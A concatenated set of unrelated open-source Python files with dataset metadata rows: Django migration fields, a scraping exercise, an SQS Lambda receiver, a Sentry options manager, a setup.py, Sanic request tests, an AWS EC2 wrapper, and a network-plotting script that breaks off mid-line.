'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'unique_together': "(('key', 'value'),)", 'object_name': 'Option'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'owned_project_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectdomain': {
'Meta': {'unique_together': "(('project', 'domain'),)", 'object_name': 'ProjectDomain'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'domain_set'", 'to': "orm['sentry.Project']"})
},
'sentry.projectmember': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'project_set'", 'to': "orm['auth.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.view': {
'Meta': {'object_name': 'View'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'verbose_name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['sentry']
| bsd-3-clause | 8,498,152,610,313,789,000 | 76.860825 | 182 | 0.547368 | false |
krzyste/ud032 | Lesson_2_Data_in_More_Complex_Formats/18-Using_Beautiful_Soup/html_soup.py | 1 | 1546 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Please note that the function 'make_request' is provided for your reference only.
# You will not be able to actually use it from within the Udacity web UI
# All your changes should be in the 'extract_data' function
from bs4 import BeautifulSoup
import requests
import json
html_page = "page_source.html"
def extract_data(page):
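    # The ASP.NET page hides __EVENTVALIDATION and __VIEWSTATE values in the form;
    # both must be scraped here and replayed later by the POST in make_request.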
data = {"eventvalidation": "",
"viewstate": ""}
with open(page, "r") as html:
soup = BeautifulSoup(html)
_eventValid = soup.find(id="__EVENTVALIDATION")
data["eventvalidation"]=_eventValid["value"]
_viewState = soup.find(id="__VIEWSTATE")
data["viewstate"]=_viewState["value"]
return data
def make_request(data):
eventvalidation = data["eventvalidation"]
viewstate = data["viewstate"]
r = requests.post("http://www.transtats.bts.gov/Data_Elements.aspx?Data=2",
data={'AirportList': "BOS",
'CarrierList': "VX",
'Submit': 'Submit',
"__EVENTTARGET": "",
"__EVENTARGUMENT": "",
"__EVENTVALIDATION": eventvalidation,
"__VIEWSTATE": viewstate
})
return r.text
def test():
data = extract_data(html_page)
assert data["eventvalidation"] != ""
assert data["eventvalidation"].startswith("/wEWjAkCoIj1ng0")
assert data["viewstate"].startswith("/wEPDwUKLTI")
test() | agpl-3.0 | -8,655,408,168,734,604,000 | 29.333333 | 83 | 0.575679 | false |
MrPablozOne/Bakalarka_Kaira | gui/paths.py | 6 | 1111 | #
# Copyright (C) 2010 Stanislav Bohm
#
# This file is part of Kaira.
#
# Kaira is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License, or
# (at your option) any later version.
#
# Kaira is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Kaira. If not, see <http://www.gnu.org/licenses/>.
#
import os
KAIRA_GUI = os.path.dirname(os.path.abspath(__file__))
KAIRA_ROOT = os.path.dirname(KAIRA_GUI)
ICONS_DIR = os.path.join(KAIRA_GUI, "icons")
UI_DIR = os.path.join(KAIRA_GUI, "ui")
PTP_DIR = os.path.join(KAIRA_ROOT, "ptp")
PTP_BIN = os.path.join(KAIRA_ROOT, "ptp", "ptp.py")
PACKAGES_DIR = os.path.join(KAIRA_ROOT, "packages")
EXTENSIONS_DIR = os.path.join(KAIRA_GUI, "extensions")
| gpl-3.0 | 7,730,314,161,531,714,000 | 33.71875 | 73 | 0.70387 | false |
lucioveloso/lambda-toolkit | lambda_toolkit/modules/receiver.py | 1 | 2977 | #!/usr/bin/env python
import json
import os
import sys
import signal
from lambda_toolkit.modules.utils import Utils
from lambda_toolkit.modules.lambdacontext import LambdaContext
def signal_handler(signal, frame):
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
class Receiver:
def __init__(self, conf, kwargs):
self.log = conf.log
self.conf = conf
self.sqsname = kwargs['sqsname']
self.projectname = kwargs['projectname']
self.sqs = conf.get_boto3("sqs", "resource")
def collect_receiver(self):
queue = self.sqs.get_queue_by_name(QueueName=self.sqsname)
self.log.info("Importing project " + self.projectname)
pp = os.path.join(Utils.fixpath(self.conf.sett['C_BASE_DIR']),
Utils.fixpath(self.conf.sett['C_LAMBDAS_DIR']),
self.conf.region, self.projectname)
self.log.debug("Using project dir: " + pp)
sys.path.append(pp)
a = __import__("index")
func = getattr(a, "lambda_handler")
self.log.info("Starting the receiver using the queue " + self.sqsname)
if 'variables' in self.conf.projects[self.projectname]:
vars = self.conf.projects[self.projectname]['variables']
for v in vars:
self.log.info("Injecting lambda variable '" + v + "' with value '" + vars[v] + "'.")
os.environ[v] = vars[v]
while True:
try:
sys.stdout.write(".")
sys.stdout.flush()
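                # Long-poll SQS for a batch of messages; the visibility timeout,
                # batch size and wait time all come from the toolkit settings.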
msg_list = queue.receive_messages(
VisibilityTimeout=int(self.conf.sett['QUEUE_GETMESSAGE_VISIBILITY_TIMEOUT']),
MaxNumberOfMessages=int(self.conf.sett['QUEUE_GETMESSAGE_MAXNUMBEROFMESSAGES']),
WaitTimeSeconds=int(self.conf.sett['QUEUE_GETMESSAGE_WAITTIMESECONDS']))
for msg in msg_list:
jsonmsg = json.loads(msg.body)
self.log.info("=======================================")
self.log.info("* New message. Sending to " + self.projectname)
if func(jsonmsg["event"], LambdaContext(jsonmsg["context"])):
try:
msg.delete()
self.log.info("* Message deleted.")
except Exception as e:
self.log.warn("* Failed to delete the message. Expired.")
self.log.warn("Configured timeout [QUEUE_GETMESSAGE_VISIBILITY_TIMEOUT]: " + str(self.conf.sett[
'QUEUE_GETMESSAGE_VISIBILITY_TIMEOUT']))
else:
self.log.info("* Project " + self.projectname + " returned False. Keeping message in the queue.")
self.log.info("=======================================")
except Exception as a:
print(a)
| apache-2.0 | -2,534,512,834,870,983,000 | 40.347222 | 124 | 0.535438 | false |
camilonova/sentry | src/sentry/options/manager.py | 1 | 4737 | """
sentry.options.manager
~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import logging
from django.conf import settings
from django.utils import timezone
from hashlib import md5
from sentry.app import cache
from sentry.db.models.query import create_or_update
from sentry.models import Option
CACHE_FETCH_ERR = 'Unable to fetch option cache for %s'
CACHE_UPDATE_ERR = 'Unable to update option cache for %s'
class OptionsManager(object):
"""
A backend for storing generic configuration within Sentry.
Legacy Django configuration should be deprioritized in favor of more dynamic
configuration through the options backend, which is backed by a cache and a
database.
    You **always** will receive a response to ``get()``. The response is eventually
    consistent, with the accuracy window depending on the queue workload, and you
    should treat all values as temporary: given a dual connection failure on both
    the cache and the database, the system will fall back to hardcoded defaults.
Overall this is a very loose consistency model which is designed to give simple
dynamic configuration with maximum uptime, where defaults are always taken from
constants in the global configuration.
- Values must be strings.
- Empty values are identical to null values which are represented by ''.
"""
cache = cache
logger = logging.getLogger('sentry.errors')
# we generally want to always persist
ttl = None
def __init__(self, cache=None, ttl=None, logger=None):
if cache is not None:
self.cache = cache
if ttl is not None:
self.ttl = ttl
if logger is not None:
self.logger = logger
def _make_cache_key(self, key):
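        # Hash the option key so arbitrary key strings map to short, cache-safe names.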
return 'o:{0}'.format(md5(key).hexdigest())
def set(self, key, value):
"""
Set the value for an option. If the cache is unavailable the action will
        still succeed.
>>> from sentry import options
>>> options.set('option', 'value')
"""
create_or_update(
model=Option,
key=key,
defaults={
'value': value,
'last_updated': timezone.now(),
}
)
try:
self.update_cached_value(key, value)
except Exception as e:
self.logger.warn(CACHE_UPDATE_ERR, key, exc_info=True)
def get(self, key):
"""
Get the value of an option prioritizing the cache, then the database,
and finally the local configuration.
If no value is present for the key, an empty value ('') is returned.
>>> from sentry import options
>>> options.get('option')
"""
cache_key = self._make_cache_key(key)
try:
result = self.cache.get(cache_key)
except Exception as e:
self.logger.warn(CACHE_FETCH_ERR, key, exc_info=True)
result = None
cache_success = False
else:
cache_success = True
if result is None:
try:
result = Option.objects.get(key=key).value
except Option.DoesNotExist:
result = ''
except Exception as e:
self.logger.exception(unicode(e))
result = None
# we only attempt to populate the cache if we were previously
# able to successfully talk to the backend
if result is not None and cache_success:
try:
self.update_cached_value(key, result)
except Exception as e:
self.logger.warn(CACHE_UPDATE_ERR, key, exc_info=True)
if not result:
# default to the hardcoded local configuration for this key
result = settings.SENTRY_OPTIONS.get(key)
return result or ''
def delete(self, key):
"""
Permanently remove the value of an option.
This will also clear the value within the cache, which means a following
get() will result in a miss.
>>> from sentry import options
>>> options.delete('option')
"""
cache_key = self._make_cache_key(key)
Option.objects.filter(key=key).delete()
try:
self.cache.delete(cache_key)
except Exception as e:
self.logger.warn(CACHE_UPDATE_ERR, key, exc_info=True)
def update_cached_value(self, key, value):
cache_key = self._make_cache_key(key)
self.cache.set(cache_key, value, self.ttl)
| bsd-3-clause | 267,538,300,001,631,040 | 29.75974 | 83 | 0.608613 | false |
faddai/newfies-dialer | setup.py | 1 | 4242 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Newfies-Dialer License
# http://www.newfies-dialer.org
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (C) 2011-2012 Star2Billing S.L.
#
# The Initial Developer of the Original Code is
# Arezqui Belaid <[email protected]>
#
import os
from setuptools import setup, find_packages
from setuptools.dist import Distribution
import pkg_resources
import sys
import re
from newfies import VERSION
add_django_dependency = True
try:
pkg_resources.get_distribution('Django')
add_django_dependency = False
except pkg_resources.DistributionNotFound:
try:
import django
if django.VERSION[0] >= 1 and django.VERSION[1] >= 2 \
and django.VERSION[2] >= 0:
add_django_dependency = False
except ImportError:
pass
Distribution({'setup_requires': add_django_dependency
and ['Django >=1.3.0'] or []})
COMMANDS = {}
try:
from sphinx.setup_command import BuildDoc
COMMANDS['build_sphinx'] = BuildDoc
except ImportError:
pass
try:
from sphinx_pypi_upload import UploadDoc
COMMANDS['upload_sphinx'] = UploadDoc
except ImportError:
pass
# Compile the list of packages available, because distutils doesn't have
# an easy way to do this.
(packages, data_files, temp_data_files, addons_data_files) = ([], [],
[], [])
(docs_data_files, resources_data_files) = ([], [])
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
def parse_requirements(file_name):
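    # Skip comments and blank lines, reduce "-e ...#egg=<name>" entries to the bare
    # package name, and drop raw git/hg URLs (those are handled as dependency links).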
requirements = []
for line in open(file_name, 'r').read().split('\n'):
if re.match(r'(\s*#)|(\s*$)', line):
continue
if re.match(r'\s*-e\s+', line):
requirements.append(re.sub(r'\s*-e\s+.*#egg=(.*)$', r'\1',
line))
elif re.match(r'(\s*git)|(\s*hg)', line):
pass
else:
requirements.append(line)
return requirements
def parse_dependency_links(file_name, install_flag=False):
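    # Collect "-e" entries as pip dependency links; when install_flag is set,
    # git/hg requirements are installed directly through a "pip install -f" call.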
dependency_links = []
for line in open(file_name, 'r').read().split('\n'):
if re.match(r'\s*-e\s+', line):
dependency_links.append(re.sub(r'\s*-e\s+', '', line))
if re.match(r'(\s*git)|(\s*hg)', line):
if install_flag == True:
line_arr = line.split('/')
line_arr_length = len(line.split('/'))
pck_name = line_arr[line_arr_length - 1].split('.git')
if len(pck_name) == 2:
os.system('pip install -f %s %s' % (pck_name[0],
line))
if len(pck_name) == 1:
os.system('pip install -f %s %s' % (pck_name, line))
return dependency_links
install_flag = False
if sys.argv[1] == 'install':
install_flag = True
setup(
name='newfies-dialer',
version=VERSION.replace(' ', '-'),
description='Newfies is a Bulk Dialer and Voice Broadcasting application '
                'dedicated to providing information via phone technology.',
long_description=open('README.rst').read(),
author='Belaid Arezqui',
author_email='[email protected]',
url='http://www.newfies-dialer.org/',
download_url='https://github.com/Star2Billing/newfies-dialer'
'/tarball/master',
packages=find_packages(),
include_package_data=True,
license='MPL 2.0 License',
classifiers=[
'Development Status :: 1 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers, Users',
'License :: OSI Approved :: MPL 2.0 License',
'Operating System :: OS Independent',
'Programming Language :: Python, Javascript, HTML',
'Topic :: Voice Broadcast Software',
],
zip_safe=False,
install_requires=parse_requirements('install/conf/requirements.txt'),
dependency_links=parse_dependency_links('install/conf/requirements.txt',
install_flag),
setup_requires=['Django >= 1.3.0', 'Sphinx >= 0.4.2'],
cmdclass=COMMANDS,
)
| mpl-2.0 | 1,359,346,065,259,868,700 | 31.136364 | 78 | 0.603725 | false |
jrocketfingers/sanic | tests/test_requests.py | 1 | 7745 | from json import loads as json_loads, dumps as json_dumps
from urllib.parse import urlparse
import os
import ssl
import pytest
from sanic import Sanic
from sanic.exceptions import ServerError
from sanic.response import json, text
from sanic.testing import HOST, PORT
# ------------------------------------------------------------ #
# GET
# ------------------------------------------------------------ #
def test_sync():
app = Sanic('test_text')
@app.route('/')
def handler(request):
return text('Hello')
request, response = app.test_client.get('/')
assert response.text == 'Hello'
def test_text():
app = Sanic('test_text')
@app.route('/')
async def handler(request):
return text('Hello')
request, response = app.test_client.get('/')
assert response.text == 'Hello'
def test_headers():
app = Sanic('test_text')
@app.route('/')
async def handler(request):
headers = {"spam": "great"}
return text('Hello', headers=headers)
request, response = app.test_client.get('/')
assert response.headers.get('spam') == 'great'
def test_non_str_headers():
app = Sanic('test_text')
@app.route('/')
async def handler(request):
headers = {"answer": 42}
return text('Hello', headers=headers)
request, response = app.test_client.get('/')
assert response.headers.get('answer') == '42'
def test_invalid_response():
app = Sanic('test_invalid_response')
@app.exception(ServerError)
def handler_exception(request, exception):
return text('Internal Server Error.', 500)
@app.route('/')
async def handler(request):
return 'This should fail'
request, response = app.test_client.get('/')
assert response.status == 500
assert response.text == "Internal Server Error."
def test_json():
app = Sanic('test_json')
@app.route('/')
async def handler(request):
return json({"test": True})
request, response = app.test_client.get('/')
results = json_loads(response.text)
assert results.get('test') == True
def test_empty_json():
app = Sanic('test_json')
@app.route('/')
async def handler(request):
assert request.json == None
return json(request.json)
request, response = app.test_client.get('/')
assert response.status == 200
assert response.text == 'null'
def test_invalid_json():
app = Sanic('test_json')
@app.route('/')
async def handler(request):
return json(request.json)
data = "I am not json"
request, response = app.test_client.get('/', data=data)
assert response.status == 400
def test_query_string():
app = Sanic('test_query_string')
@app.route('/')
async def handler(request):
return text('OK')
request, response = app.test_client.get(
'/', params=[("test1", "1"), ("test2", "false"), ("test2", "true")])
assert request.args.get('test1') == '1'
assert request.args.get('test2') == 'false'
def test_uri_template():
app = Sanic('test_uri_template')
@app.route('/foo/<id:int>/bar/<name:[A-z]+>')
async def handler(request):
return text('OK')
request, response = app.test_client.get('/foo/123/bar/baz')
assert request.uri_template == '/foo/<id:int>/bar/<name:[A-z]+>'
def test_token():
app = Sanic('test_post_token')
@app.route('/')
async def handler(request):
return text('OK')
# uuid4 generated token.
token = 'a1d895e0-553a-421a-8e22-5ff8ecb48cbf'
headers = {
'content-type': 'application/json',
'Authorization': '{}'.format(token)
}
request, response = app.test_client.get('/', headers=headers)
assert request.token == token
token = 'a1d895e0-553a-421a-8e22-5ff8ecb48cbf'
headers = {
'content-type': 'application/json',
'Authorization': 'Token {}'.format(token)
}
request, response = app.test_client.get('/', headers=headers)
assert request.token == token
token = 'a1d895e0-553a-421a-8e22-5ff8ecb48cbf'
headers = {
'content-type': 'application/json',
'Authorization': 'Bearer Token {}'.format(token)
}
request, response = app.test_client.get('/', headers=headers)
assert request.token == token
# ------------------------------------------------------------ #
# POST
# ------------------------------------------------------------ #
def test_post_json():
app = Sanic('test_post_json')
@app.route('/', methods=['POST'])
async def handler(request):
return text('OK')
payload = {'test': 'OK'}
headers = {'content-type': 'application/json'}
request, response = app.test_client.post(
'/', data=json_dumps(payload), headers=headers)
assert request.json.get('test') == 'OK'
assert response.text == 'OK'
def test_post_form_urlencoded():
app = Sanic('test_post_form_urlencoded')
@app.route('/', methods=['POST'])
async def handler(request):
return text('OK')
payload = 'test=OK'
headers = {'content-type': 'application/x-www-form-urlencoded'}
request, response = app.test_client.post('/', data=payload, headers=headers)
assert request.form.get('test') == 'OK'
def test_post_form_multipart_form_data():
app = Sanic('test_post_form_multipart_form_data')
@app.route('/', methods=['POST'])
async def handler(request):
return text('OK')
payload = '------sanic\r\n' \
'Content-Disposition: form-data; name="test"\r\n' \
'\r\n' \
'OK\r\n' \
'------sanic--\r\n'
headers = {'content-type': 'multipart/form-data; boundary=----sanic'}
request, response = app.test_client.post(data=payload, headers=headers)
assert request.form.get('test') == 'OK'
@pytest.mark.parametrize(
'path,query,expected_url', [
('/foo', '', 'http://{}:{}/foo'),
('/bar/baz', '', 'http://{}:{}/bar/baz'),
('/moo/boo', 'arg1=val1', 'http://{}:{}/moo/boo?arg1=val1')
])
def test_url_attributes_no_ssl(path, query, expected_url):
app = Sanic('test_url_attrs_no_ssl')
async def handler(request):
return text('OK')
app.add_route(handler, path)
request, response = app.test_client.get(path + '?{}'.format(query))
assert request.url == expected_url.format(HOST, PORT)
parsed = urlparse(request.url)
assert parsed.scheme == request.scheme
assert parsed.path == request.path
assert parsed.query == request.query_string
assert parsed.netloc == request.host
@pytest.mark.parametrize(
'path,query,expected_url', [
('/foo', '', 'https://{}:{}/foo'),
('/bar/baz', '', 'https://{}:{}/bar/baz'),
('/moo/boo', 'arg1=val1', 'https://{}:{}/moo/boo?arg1=val1')
])
def test_url_attributes_with_ssl(path, query, expected_url):
app = Sanic('test_url_attrs_with_ssl')
current_dir = os.path.dirname(os.path.realpath(__file__))
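    # Build a server-side TLS context from the bundled self-signed certificate
    # so the test app can be exercised over HTTPS.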
context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain(
os.path.join(current_dir, 'certs/selfsigned.cert'),
keyfile=os.path.join(current_dir, 'certs/selfsigned.key'))
async def handler(request):
return text('OK')
app.add_route(handler, path)
request, response = app.test_client.get(
'https://{}:{}'.format(HOST, PORT) + path + '?{}'.format(query),
server_kwargs={'ssl': context})
assert request.url == expected_url.format(HOST, PORT)
parsed = urlparse(request.url)
assert parsed.scheme == request.scheme
assert parsed.path == request.path
assert parsed.query == request.query_string
assert parsed.netloc == request.host
| mit | -1,173,841,029,777,326 | 24.989933 | 80 | 0.58825 | false |
willprice/arduino-sphere-project | scripts/example_direction_finder/temboo/Library/Amazon/EC2/DeleteVolume.py | 5 | 4141 | # -*- coding: utf-8 -*-
###############################################################################
#
# DeleteVolume
# Deletes a volume using a volume id that you specify.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class DeleteVolume(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the DeleteVolume Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(DeleteVolume, self).__init__(temboo_session, '/Library/Amazon/EC2/DeleteVolume')
def new_input_set(self):
return DeleteVolumeInputSet()
def _make_result_set(self, result, path):
return DeleteVolumeResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return DeleteVolumeChoreographyExecution(session, exec_id, path)
class DeleteVolumeInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the DeleteVolume
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AWSAccessKeyId(self, value):
"""
Set the value of the AWSAccessKeyId input for this Choreo. ((required, string) The Access Key ID provided by Amazon Web Services.)
"""
super(DeleteVolumeInputSet, self)._set_input('AWSAccessKeyId', value)
def set_AWSSecretKeyId(self, value):
"""
Set the value of the AWSSecretKeyId input for this Choreo. ((required, string) The Secret Key ID provided by Amazon Web Services.)
"""
super(DeleteVolumeInputSet, self)._set_input('AWSSecretKeyId', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are "xml" (the default) and "json".)
"""
super(DeleteVolumeInputSet, self)._set_input('ResponseFormat', value)
def set_UserRegion(self, value):
"""
Set the value of the UserRegion input for this Choreo. ((optional, string) The AWS region that corresponds to the EC2 endpoint you wish to access. The default region is "us-east-1". See description below for valid values.)
"""
super(DeleteVolumeInputSet, self)._set_input('UserRegion', value)
def set_VolumeId(self, value):
"""
Set the value of the VolumeId input for this Choreo. ((required, string) The id of the volume to delete.)
"""
super(DeleteVolumeInputSet, self)._set_input('VolumeId', value)
class DeleteVolumeResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the DeleteVolume Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Amazon.)
"""
return self._output.get('Response', None)
class DeleteVolumeChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return DeleteVolumeResultSet(response, path)
| gpl-2.0 | 9,148,499,344,192,354,000 | 39.598039 | 230 | 0.674475 | false |
richrr/scripts | python/plot-network-graph-june-22-backup.py | 1 | 15903 | import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
from utils import *
import brewer2mpl
import re
import os
import sys
import operator
from time import localtime, strftime
import argparse
import os.path
from subprocess import Popen, PIPE
from collections import defaultdict
import math
#python ~/scripts/python/plot-network-graph.py L3_invasive\ 0.310-randomwalk-test.sif L3_invasive\ 0.310\ node_attribute-randomwalk.txt out
#python ~/scripts/python/plot-network-graph.py -i L3_invasive\ 0.310\ edge_attribute-randomwalk.txt -n L3_invasive\ 0.310\ node_attribute-randomwalk.txt
#python ~/scripts/python/plot-network-graph.py -i L3_native\ 0.310\ edge_attribute-randomwalk.txt -n L3_native\ 0.310\ node_attribute-randomwalk.txt
def create_pretty_node_labels(G):
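    # Shorten node labels to at most five characters of the class-level name
    # (the text after 'c__') so they stay legible on the plot.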
new_labels = dict()
for old_label in G.nodes():
cont = old_label.split("c__")
new_labels[old_label] = cont[-1] if len(cont) > 1 else cont[0] # UnassignedOtherOther -> cont[0]
tmp = new_labels[old_label]
new_labels[old_label] = tmp if len(tmp)<=5 else tmp[:5]
return new_labels
def preprocess_graph(edges, node_module_dict):
edges_between_nodes_from_same_module = list()
for (u,v) in edges:
#print u, "---->", v
if u in node_module_dict and v in node_module_dict:
if node_module_dict[u] == node_module_dict[v]:
edges_between_nodes_from_same_module.append((u,v))
else:
print "One or both nodes of the edge are missing from the attribute file"
# for nodes that do not have edges when inter module edges are removed
for (u,v) in edges:
u_present = [tup for tup in edges_between_nodes_from_same_module if u in tup]
if len(u_present) == 0:
edges_between_nodes_from_same_module.append((u,u))
v_present = [tup for tup in edges_between_nodes_from_same_module if v in tup]
if len(v_present) == 0:
edges_between_nodes_from_same_module.append((v,v))
return edges_between_nodes_from_same_module
def identify_node_categ(node_module_dict):
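    # Extract the phylum for each OTU, i.e. the text between 'p__' and 'c__'
    # in the taxonomy string.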
node_categ_dict = dict()
for node in node_module_dict:
start = 'p__'
end = 'c__'
result = node
if start in node and end in node:
result = re.search('%s(.*)%s' % (start, end), node).group(1)
node_categ_dict[node] = result
#print node, result
return node_categ_dict
def main(args):
parser = argparse.ArgumentParser(description='Plot networks obtained from MENA')
parser.add_argument('-i', '--infile') # file containing the edges (interactions between OTUs), can be sif or edge attribute file
parser.add_argument('-n', '--nodefile') # file containing the node attribute file
parser.add_argument('-o', '--outfilestr') # string for output filename
parser.add_argument('-l', '--logfile', default="ITS-log-file.txt") # log filename
parser.add_argument('-q', '--imagequality', default=600, type=int) # image quality dpi
parser.add_argument('-f', '--imageformat', default='pdf') # generate images in format. allowed: pdf, png, jpg, tiff
parser.add_argument('-y', '--outdir', default='./') # dir name for outputting figs.
parser.add_argument('-e', '--edgetypeoff', action='store_true', default=False) # do not distinguish positive and negative correlation edges
parser.add_argument('-d', '--delimiter', default='\t') # delimiter for file
args = parser.parse_args()
if args.infile == None or args.nodefile == None :
parser.print_help()
sys.exit('\natleast two arguments (edge file, node attributes file) required\n')
infile = args.infile
node_attrib_file = args.nodefile
outfilestring = infile.replace(' ','_')
if args.outfilestr != None:
outfilestring = args.outfilestr
outfilestring = args.outdir + outfilestring
img_qual = args.imagequality
img_frmt = args.imageformat
delim = args.delimiter
#http://www.discoveryplayground.com/computer-programming-for-kids/rgb-colors/
# purple, deep pink, red, orange, brown, wheat, yellow, forest green, cyan, blue
attrib_color_map = {'0' : '#a020f0' , '1' : '#ff1493', '2' : '#ff0000', '3' : '#ffa500' , \
'4' : '#a52a2a' , '5' : '#f5deb3', '6' : '#ffff00' , '7' : '#228b22' , '8' : '#00ffff' , '9' : '#0000ff'}
#Hot Pink,Violet,Purple,Brown,Salmon,Peru,Orange,Red,Tomato,Blue,Dodger Blue,Deep Sky Blue,Turquoise,Cyan,Light Cyan,Cadet Blue,Mint Cream,Azure,Alice Blue,Lavender,Lavender Blush,Misty Rose,Medium Aquamarine,Aquamarine,Dark Green,Dark Olive Green,Dark Sea Green,Yellow Green,Forest Green,Olive Drab,Dark Khaki,Khaki,Yellow,Light Gray,Green Yellow,Linen,Antique White,Antique White 2,Antique White 3,Antique White 4,Papaya Whip,Blanched Almond,Bisque,Bisque 2,Bisque 3,Bisque 4,Peach Puff,Peach Puff 2,Peach Puff 3,Peach Puff 4,Navajo White,Moccasin,Cornsilk,Cornsilk 2,Cornsilk 3,Cornsilk 4,Ivory,Seashell 2,Seashell 3,Seashell 4,Honeydew,Honeydew 2,Honeydew 3,Honeydew 4,Steel Blue,Light Steel Blue,Light Blue,Powder Blue
